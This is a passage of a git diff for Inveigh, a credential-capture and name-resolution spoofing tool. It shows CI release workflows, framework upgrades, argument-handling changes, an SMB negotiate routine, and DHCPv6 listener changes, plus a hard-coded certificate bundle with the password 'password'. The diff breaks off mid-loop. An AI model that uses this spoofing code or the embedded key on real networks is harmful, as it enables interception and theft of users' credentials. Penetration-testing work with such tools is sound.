diff options
121 files changed, 2230 insertions, 951 deletions
diff --git a/.github/workflows/dev.yml b/.github/workflows/dev.yml new file mode 100644 index 0000000..ad0b8f2 --- /dev/null +++ b/.github/workflows/dev.yml @@ -0,0 +1,67 @@ +on: + push: + branches: [ dev ] + pull_request: + branches: [ dev ] + +name: Dev + +jobs: + build: + runs-on: windows-latest + defaults: + run: + shell: bash + + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Setup .NET Core SDK + uses: actions/setup-dotnet@v2 + with: + dotnet-version: 6.0.x + + - name: Restore Dependencies + run: dotnet restore + + - name: Build + run: | + VERSION=${{ github.ref_name }} + dotnet build -c debug + + - name: Zip - Build + run: | + 7z a -tzip -mx9 Inveigh-net3.5-dev.zip $PWD/Inveigh/bin/debug/net35/* + 7z a -tzip -mx9 Inveigh-net4.6.2-dev.zip $PWD/Inveigh/bin/debug/net462/* + 7z a -tzip -mx9 Inveigh-net6.0-dev.zip $PWD/Inveigh/bin/debug/net6.0/* -x!*/ + + - name: Publish - Trimmed/Single File + run: | + VERSION=${{ github.ref_name }} + dotnet publish --self-contained=true -p:PublishSingleFile=true -p:PublishTrimmed=true -r linux-x64 -f net6.0 -p:AssemblyName=inveigh -c debug + dotnet publish --self-contained=true -p:PublishSingleFile=true -p:PublishTrimmed=true -r osx-x64 -f net6.0 -p:AssemblyName=inveigh -c debug + dotnet publish --self-contained=true -p:PublishSingleFile=true -p:PublishTrimmed=true -r win-x64 -f net6.0 -c debug + + - name: Zip - Publish + run: | + tar -czvf Inveigh-net6.0-linux-x64-trimmed-single-dev.tar.gz --directory=$PWD/Inveigh/bin/debug/net6.0/linux-x64/publish/ . + tar -czvf Inveigh-net6.0-osx-x64-trimmed-single-dev.tar.gz --directory=$PWD/Inveigh/bin/debug/net6.0/osx-x64/publish/ . + 7z a -tzip -mx9 Inveigh-net6.0-win-x64-trimmed-single-dev.zip $PWD/Inveigh/bin/debug/net6.0/win-x64/publish/* + + - name: Release .zip + if: "! startsWith(github.event_name, 'pull_request')" + uses: softprops/action-gh-release@v1 + with: + name: Dev Branch Debug Builds + tag_name: development + prerelease: true + files: "Inveigh*.zip" + body: | + Latest ${{ github.ref_name }} branch debug builds (${{ github.sha }}) + + - name: Release tar.gz + uses: softprops/action-gh-release@v1 + with: + tag_name: development + files: "Inveigh*.tar.gz" diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml new file mode 100644 index 0000000..f73107e --- /dev/null +++ b/.github/workflows/release.yml @@ -0,0 +1,59 @@ +name: Release + +on: + push: + tags: + - "v*.*.*" + +jobs: + build: + runs-on: windows-latest + defaults: + run: + shell: bash + + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Setup .NET Core SDK + uses: actions/setup-dotnet@v2 + with: + dotnet-version: 6.0.x + + - name: Restore Dependencies + run: dotnet restore + + - name: Build + run: | + VERSION=${{ github.ref_name }} + dotnet build -c release -p:Version=${VERSION:1} + + - name: Zip - Build + run: | + 7z a -tzip -mx9 Inveigh-net3.5-${{ github.ref_name }}.zip $PWD/Inveigh/bin/release/net35/* + 7z a -tzip -mx9 Inveigh-net4.6.2-${{ github.ref_name }}.zip $PWD/Inveigh/bin/release/net462/* + 7z a -tzip -mx9 Inveigh-net6.0-${{ github.ref_name }}.zip $PWD/Inveigh/bin/release/net6.0/* -x!*/ + + - name: Publish - Trimmed/Single File + run: | + VERSION=${{ github.ref_name }} + dotnet publish --self-contained=true -p:PublishSingleFile=true -p:PublishTrimmed=true -p:Version=${VERSION:1} -r linux-x64 -f net6.0 -p:AssemblyName=inveigh -c release + dotnet publish --self-contained=true -p:PublishSingleFile=true -p:PublishTrimmed=true -p:Version=${VERSION:1} -r osx-x64 -f net6.0 -p:AssemblyName=inveigh -c release + dotnet publish --self-contained=true -p:PublishSingleFile=true -p:PublishTrimmed=true -p:Version=${VERSION:1} -r win-x64 -f net6.0 -c release + + - name: Zip - Publish + run: | + tar -czvf Inveigh-net6.0-linux-x64-trimmed-single-${{ github.ref_name }}.tar.gz --directory=$PWD/Inveigh/bin/release/net6.0/linux-x64/publish/ . + tar -czvf Inveigh-net6.0-osx-x64-trimmed-single-${{ github.ref_name }}.tar.gz --directory=$PWD/Inveigh/bin/release/net6.0/osx-x64/publish/ . + 7z a -tzip -mx9 Inveigh-net6.0-win-x64-trimmed-single-${{ github.ref_name }}.zip $PWD/Inveigh/bin/release/net6.0/win-x64/publish/* + + - name: Release .zip + uses: softprops/action-gh-release@v1 + with: + files: "Inveigh*.zip" + + - name: Release tar.gz + uses: softprops/action-gh-release@v1 + with: + files: "Inveigh*.tar.gz" diff --git a/Inveigh/FodyWeavers.xml b/Inveigh/FodyWeavers.xml new file mode 100644 index 0000000..5029e70 --- /dev/null +++ b/Inveigh/FodyWeavers.xml @@ -0,0 +1,3 @@ +<Weavers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="FodyWeavers.xsd"> + <Costura /> +</Weavers>
\ No newline at end of file diff --git a/Inveigh/FodyWeavers.xsd b/Inveigh/FodyWeavers.xsd new file mode 100644 index 0000000..05e92c1 --- /dev/null +++ b/Inveigh/FodyWeavers.xsd @@ -0,0 +1,141 @@ +<?xml version="1.0" encoding="utf-8"?> +<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> + <!-- This file was generated by Fody. Manual changes to this file will be lost when your project is rebuilt. --> + <xs:element name="Weavers"> + <xs:complexType> + <xs:all> + <xs:element name="Costura" minOccurs="0" maxOccurs="1"> + <xs:complexType> + <xs:all> + <xs:element minOccurs="0" maxOccurs="1" name="ExcludeAssemblies" type="xs:string"> + <xs:annotation> + <xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation> + </xs:annotation> + </xs:element> + <xs:element minOccurs="0" maxOccurs="1" name="IncludeAssemblies" type="xs:string"> + <xs:annotation> + <xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation> + </xs:annotation> + </xs:element> + <xs:element minOccurs="0" maxOccurs="1" name="ExcludeRuntimeAssemblies" type="xs:string"> + <xs:annotation> + <xs:documentation>A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation> + </xs:annotation> + </xs:element> + <xs:element minOccurs="0" maxOccurs="1" name="IncludeRuntimeAssemblies" type="xs:string"> + <xs:annotation> + <xs:documentation>A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation> + </xs:annotation> + </xs:element> + <xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string"> + <xs:annotation> + <xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with line breaks.</xs:documentation> + </xs:annotation> + </xs:element> + <xs:element minOccurs="0" maxOccurs="1" name="Unmanaged64Assemblies" type="xs:string"> + <xs:annotation> + <xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with line breaks.</xs:documentation> + </xs:annotation> + </xs:element> + <xs:element minOccurs="0" maxOccurs="1" name="PreloadOrder" type="xs:string"> + <xs:annotation> + <xs:documentation>The order of preloaded assemblies, delimited with line breaks.</xs:documentation> + </xs:annotation> + </xs:element> + </xs:all> + <xs:attribute name="CreateTemporaryAssemblies" type="xs:boolean"> + <xs:annotation> + <xs:documentation>This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="IncludeDebugSymbols" type="xs:boolean"> + <xs:annotation> + <xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="IncludeRuntimeReferences" type="xs:boolean"> + <xs:annotation> + <xs:documentation>Controls if runtime assemblies are also embedded.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="UseRuntimeReferencePaths" type="xs:boolean"> + <xs:annotation> + <xs:documentation>Controls whether the runtime assemblies are embedded with their full path or only with their assembly name.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="DisableCompression" type="xs:boolean"> + <xs:annotation> + <xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="DisableCleanup" type="xs:boolean"> + <xs:annotation> + <xs:documentation>As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="LoadAtModuleInit" type="xs:boolean"> + <xs:annotation> + <xs:documentation>Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="IgnoreSatelliteAssemblies" type="xs:boolean"> + <xs:annotation> + <xs:documentation>Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="ExcludeAssemblies" type="xs:string"> + <xs:annotation> + <xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="IncludeAssemblies" type="xs:string"> + <xs:annotation> + <xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="ExcludeRuntimeAssemblies" type="xs:string"> + <xs:annotation> + <xs:documentation>A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="IncludeRuntimeAssemblies" type="xs:string"> + <xs:annotation> + <xs:documentation>A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="Unmanaged32Assemblies" type="xs:string"> + <xs:annotation> + <xs:documentation>A list of unmanaged 32 bit assembly names to include, delimited with |.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="Unmanaged64Assemblies" type="xs:string"> + <xs:annotation> + <xs:documentation>A list of unmanaged 64 bit assembly names to include, delimited with |.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="PreloadOrder" type="xs:string"> + <xs:annotation> + <xs:documentation>The order of preloaded assemblies, delimited with |.</xs:documentation> + </xs:annotation> + </xs:attribute> + </xs:complexType> + </xs:element> + </xs:all> + <xs:attribute name="VerifyAssembly" type="xs:boolean"> + <xs:annotation> + <xs:documentation>'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="VerifyIgnoreCodes" type="xs:string"> + <xs:annotation> + <xs:documentation>A comma-separated list of error codes that can be safely ignored in assembly verification.</xs:documentation> + </xs:annotation> + </xs:attribute> + <xs:attribute name="GenerateXsd" type="xs:boolean"> + <xs:annotation> + <xs:documentation>'false' to turn off automatic generation of the XML Schema file.</xs:documentation> + </xs:annotation> + </xs:attribute> + </xs:complexType> + </xs:element> +</xs:schema>
\ No newline at end of file diff --git a/Inveigh/Inveigh.csproj b/Inveigh/Inveigh.csproj index b0dbbf3..7efd2f5 100644 --- a/Inveigh/Inveigh.csproj +++ b/Inveigh/Inveigh.csproj @@ -2,55 +2,58 @@ <PropertyGroup> <OutputType>Exe</OutputType> - <TargetFrameworks>net35;net45;net5.0</TargetFrameworks> + <TargetFrameworks>net35;net462;net6.0</TargetFrameworks> + <PlatformTarget>AnyCPU</PlatformTarget> </PropertyGroup> - - - - - <PropertyGroup> - <!-- https://github.com/dotnet/msbuild/issues/1333#issuecomment-296346352 --> - <FrameworkPathOverride Condition="'$(TargetFramework)' == 'net35'">$(MSBuildProgramFiles32)\Reference Assemblies\Microsoft\Framework\.NETFramework\v3.5\Profile\Client</FrameworkPathOverride> - <AutomaticallyUseReferenceAssemblyPackages Condition=" '$(TargetFramework)' == 'net35' ">false</AutomaticallyUseReferenceAssemblyPackages> - <AssemblyName>Inveigh</AssemblyName> - <Version>2.0.0</Version> - </PropertyGroup> - - + <PropertyGroup Condition="'$(Configuration)|$(TargetFrameworks)|$(Platform)'=='Debug|net35|AnyCPU'"> <DebugType>pdbonly</DebugType> <DebugSymbols>true</DebugSymbols> </PropertyGroup> + <ItemGroup Condition="'$(TargetFramework)' == 'net35'"> + <Reference Include="System.DirectoryServices.Protocols"> + <HintPath>$(WINDIR)\Microsoft.NET\Framework64\v2.0.50727\System.DirectoryServices.Protocols.dll</HintPath> + <private>False</private> + </Reference> + </ItemGroup> - <PropertyGroup Condition="'$(Configuration)|$(TargetFramework)|$(Platform)'=='Debug|net35|AnyCPU'"> - <DebugType>pdbonly</DebugType> - <DebugSymbols>true</DebugSymbols> - </PropertyGroup> - - <ItemGroup Condition="'$(TargetFramework)' == 'net35'"> - <Reference Include="System.DirectoryServices.Protocols"> - <HintPath>$(WINDIR)\Microsoft.NET\Framework64\v2.0.50727\System.DirectoryServices.Protocols.dll</HintPath> - <private>False</private> - </Reference> - </ItemGroup> - - - <ItemGroup Condition="'$(TargetFramework)' == 'net45'"> + <ItemGroup Condition="'$(TargetFramework)' == 'net462'"> <PackageReference Include="System.DirectoryServices.Protocols"> - <Version>5.0.1</Version> + <Version>6.0.1</Version> </PackageReference> </ItemGroup> - - <ItemGroup Condition="'$(TargetFramework)' == 'net5.0'"> + <ItemGroup Condition="'$(TargetFramework)' == 'net6.0'"> <PackageReference Include="System.DirectoryServices.Protocols"> - <Version>5.0.1</Version> + <Version>6.0.1</Version> </PackageReference> </ItemGroup> - <PropertyGroup Condition="'$(TargetFramework)' == 'net5.0'"> - <DefineConstants>ISNET5_0</DefineConstants> + <ItemGroup Condition="'$(TargetFramework)' == 'net462'"> + <PackageReference Include="Costura.Fody" Version="5.7.0"> + <PrivateAssets>all</PrivateAssets> + <!--<IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets>--> + </PackageReference> + <PackageReference Include="Fody" Version="6.6.3"> + <PrivateAssets>all</PrivateAssets> + <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets> + </PackageReference> + </ItemGroup> + + <PropertyGroup Condition="'$(TargetFramework)' == 'net6.0'"> + <DefineConstants>ISNET6_0</DefineConstants> </PropertyGroup> + + <ItemGroup Condition="'$(TargetFramework)' == 'net6.0'"> + <PackageReference Include="Costura.Fody" Version="5.7.0"> + <PrivateAssets>all</PrivateAssets> + <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets> + </PackageReference> + <PackageReference Include="Fody" Version="6.6.3"> + <PrivateAssets>all</PrivateAssets> + <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets> + </PackageReference> + </ItemGroup> </Project> diff --git a/Inveigh/Listeners/SMBListener.cs b/Inveigh/Listeners/SMBListener.cs index e7606ae..263229c 100644 --- a/Inveigh/Listeners/SMBListener.cs +++ b/Inveigh/Listeners/SMBListener.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -54,7 +54,7 @@ namespace Inveigh protected override void OutputError(Exception ex, int port) { - if (ex.Message.ToString().Equals("An attempt was made to access a socket in a way forbidden by its access permissions")) + if (ex.Message.ToString().Contains("An attempt was made to access a socket in a way forbidden by its access permissions")) { Output.Queue(String.Format("[!] Failed to start SMB listener on port {0}, check IP and port usage.", port)); } diff --git a/Inveigh/Program.cs b/Inveigh/Program.cs index 3643392..97fe911 100644 --- a/Inveigh/Program.cs +++ b/Inveigh/Program.cs @@ -13,7 +13,7 @@ namespace Inveigh public static string argCert = "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"; public static string argCertPassword = "password"; public static string argChallenge = ""; - public static string argConsole = "4"; + public static string argConsole = "5"; public static string argConsoleLimit = "-1"; public static string argConsoleStatus = "0"; public static string argConsoleUnique = "Y"; @@ -39,7 +39,7 @@ namespace Inveigh public static string[] argHTTPSPorts = { "443" }; public static string argICMPv6 = "N"; public static string argICMPv6Interval = "200"; - public static string argICMPv6TTL = "1800"; + public static string argICMPv6TTL = "300"; public static string argInspect = "N"; public static string argIPv4 = "Y"; public static string argIPv6 = "Y"; @@ -174,7 +174,7 @@ namespace Inveigh public static string netbiosDomain = Environment.UserDomainName; public static string dnsDomain = ""; public static ulong smb2Session = 5548434740922023936; // todo check - public static string version = "2.0.3"; + public static string version = "2.0.6"; static void Main(string[] arguments) { @@ -185,6 +185,7 @@ namespace Inveigh enabledWindows = false; } #endif + bool allValid = true; if (arguments.Length > 0) { @@ -584,7 +585,7 @@ namespace Inveigh if (arguments.Length > 1) argHelp = arguments[entry.index + 1].ToUpper(); Output.GetHelp(argHelp); - Environment.Exit(0); + allValid &= false; break; default: @@ -606,42 +607,46 @@ namespace Inveigh Console.WriteLine("{0} error - {1}", argument, ex.Message); } - Environment.Exit(0); + allValid &= false; } } } - Arguments.ValidateArguments(); - Arguments.ParseArguments(); - Control.ImportSession(); - Output.StartupOutput(); - Control.StartThreads(); - commandHistoryList.Add(""); + allValid &= Arguments.ValidateArguments(); - while (isRunning) + if (allValid) { + Arguments.ParseArguments(); + Control.ImportSession(); + Output.StartupOutput(); + Control.StartThreads(); + commandHistoryList.Add(""); - try + while (isRunning) { - Output.OutputLoop(); - if (isRunning) + try + { + Output.OutputLoop(); + + if (isRunning) + { + Shell.ConsoleLoop(); + } + + } + catch (Exception ex) { - Shell.ConsoleLoop(); + Console.WriteLine(outputList.Count); + outputList.Add(String.Format("[-] [{0}] Console error detected - {1}", Output.Timestamp(), ex.ToString())); } } - catch (Exception ex) - { - Console.WriteLine(outputList.Count); - outputList.Add(String.Format("[-] [{0}] Console error detected - {1}", Output.Timestamp(), ex.ToString())); - } } - Environment.Exit(0); } } diff --git a/Inveigh/Protocols/Quiddity/LICENSE b/Inveigh/Protocols/Quiddity/LICENSE index cea2f49..651f1af 100644 --- a/Inveigh/Protocols/Quiddity/LICENSE +++ b/Inveigh/Protocols/Quiddity/LICENSE @@ -1,6 +1,6 @@ BSD 3-Clause License -Copyright (c) 2021, Kevin Robertson +Copyright (c) 2022, Kevin Robertson All rights reserved. Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Clients/SMBClient.cs b/Inveigh/Protocols/Quiddity/Quiddity/Clients/SMBClient.cs index 5ec2a0f..27b5493 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Clients/SMBClient.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Clients/SMBClient.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -29,23 +29,71 @@ * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ +using Quiddity.NetBIOS; +using Quiddity.SMB; +using Quiddity.SMB2; using System; using System.Collections.Generic; using System.Linq; +using System.Net.Sockets; using System.Text; namespace Quiddity.Clients { class SMBClient { + public TCPClient TCPClient { get; set; } + + public static NetworkStream tcpStream; + internal void Connect(string ipAddress, int port) { - TCPClient tcpClient = new TCPClient(ipAddress, port); - tcpClient.Connect(ipAddress, port); + TCPClient = new TCPClient(ipAddress, port); + //TCPClient.Connect(ipAddress, port); + tcpStream = TCPClient.GetStream(); } internal void Negotiate(string ipAddress, int port) { + Connect(ipAddress, port); + byte[] readBuffer = new byte[1024]; + + SMBHeader smbHeader = new SMBHeader + { + Command = 0x72, + Status = 0, + Flags = 0x18, + Flags2 = 51283, + PIDHigh = 0, + SecurityFeatures = new byte[8], + TID = 65535, + PIDLow = 65279, + UID = 0, + MID = 0 + }; + + SMBCOMNegotiateRequest smbCOMNegotiateRequest = new SMBCOMNegotiateRequest(); + byte[] sendBuffer = SMBHelper.GetBytes(new NetBIOSSessionService(), smbHeader, smbCOMNegotiateRequest); + tcpStream.Write(sendBuffer, 0, sendBuffer.Length); + tcpStream.Flush(); + tcpStream.Read(readBuffer, 0, readBuffer.Length); + + NetBIOSSessionService requestNetBIOSSessionService = new NetBIOSSessionService(readBuffer); + SMBHelper smbHelper = new SMBHelper(); + + if (requestNetBIOSSessionService.Type == 0 || smbHelper.Protocol[0] == 0xfe || smbHelper.Protocol[0] == 0xff) + { + int sessionServiceIndex = 0; + + if (requestNetBIOSSessionService.Type == 0) + { + sessionServiceIndex = 4; + } + + SMBHeader requestSMBHeader = new SMBHeader(); + SMB2Header requestSMB2Header = new SMB2Header(); + smbHelper.ReadBytes(readBuffer, sessionServiceIndex); + } } diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Clients/TCPClient.cs b/Inveigh/Protocols/Quiddity/Quiddity/Clients/TCPClient.cs index f4481e1..895f0dc 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Clients/TCPClient.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Clients/TCPClient.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -40,7 +40,7 @@ namespace Quiddity.Clients public TCPClient(string ipAddress, int port) : base(ipAddress, port) { this.Client.ReceiveTimeout = 60000; - this.ExclusiveAddressUse = false; + //this.ExclusiveAddressUse = false; } } diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DHCPv6Listener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DHCPv6Listener.cs index 1626260..3da6ec6 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DHCPv6Listener.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DHCPv6Listener.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -36,6 +36,7 @@ using System.Linq; using System.Net; using System.Net.Sockets; using System.Text; +using System.Threading; namespace Quiddity { @@ -46,6 +47,8 @@ namespace Quiddity public int Prefix { get; set; } public int Index { get; set; } + public static bool isRunning = false; + public DHCPv6Listener() { this.Index = 1; @@ -68,14 +71,33 @@ namespace Quiddity IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 547); listener.JoinMulticastGroup(IPAddress.Parse("ff02::1:2")); listener.Client.Bind(ipEndPoint); + isRunning = true; + IAsyncResult udpAsync; - while (true) - { + while (isRunning) + { try { - byte[] receiveBuffer = listener.Receive(ref ipEndPoint); - ProcessRequest(receiveBuffer, listener, ipEndPoint, mac, dnsIPv6); + udpAsync = listener.BeginReceive(null, null); + + do + { + Thread.Sleep(10); + + if (!isRunning) + { + break; + } + + } + while 